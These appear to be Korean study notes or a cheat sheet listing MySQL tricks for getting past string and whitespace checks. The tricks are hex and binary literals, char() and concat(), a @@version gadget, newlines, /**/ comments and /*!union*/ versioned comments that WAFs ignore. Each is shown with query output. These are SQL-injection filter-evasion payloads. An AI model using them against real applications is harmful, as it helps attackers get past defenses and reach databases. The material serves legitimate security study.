MySQL 진법을 이용한 문자열 검사 우회
select 0x6162, 0b110000101100010;
/*
+--------+-------------------+
| 0x6162 | 0b110000101100010 |
+--------+-------------------+
| ab     | ab                |
+--------+-------------------+
1 row in set (0.00 sec)
*/

MySQL 함수를 이용한 문자열 검사 우회
select char(0x61, 0x62);
/*
+------------------+
| char(0x61, 0x62) |
+------------------+
| ab               |
+------------------+
1 row in set (0.00 sec)
*/
select concat(char(0x61), char(0x62));
/*
+--------------------------------+
| concat(char(0x61), char(0x62)) |
+--------------------------------+
| ab                             |
+--------------------------------+
*/

MySQL 가젯을 이용한 문자열 검사 우회 =
mysql> select mid(@@version,12,1);
/*
+---------------------+
| mid(@@version,12,1) |
+---------------------+
| n                   |
+---------------------+
*/

MySQL 개행을 이용한 공백 검사 우회
select
    -> 1;
/*
+---+
| 1 |
+---+
| 1 |
+---+
*/

MySQL 주석을 이용한 공백 검사 우회
select/**/1;
/*
+---+
| 1 |
+---+
| 1 |
+---+
*/

WAF에서는 "/*...*/" 문자열을 주석으로 인식하고 쿼리 구문으로 해석하지 않는다
그러나 MySQL Server에서 제공하는 기능 중 "/*!...*/"는 주석 내 구문을 분석하고
이를 쿼리의 일부로 실행한다
select 1 /*!union*/ select 2;
/*
+---+
| 1 |
+---+
| 1 |
| 2 |
+---+
2 rows in set (0.00 sec)
*/

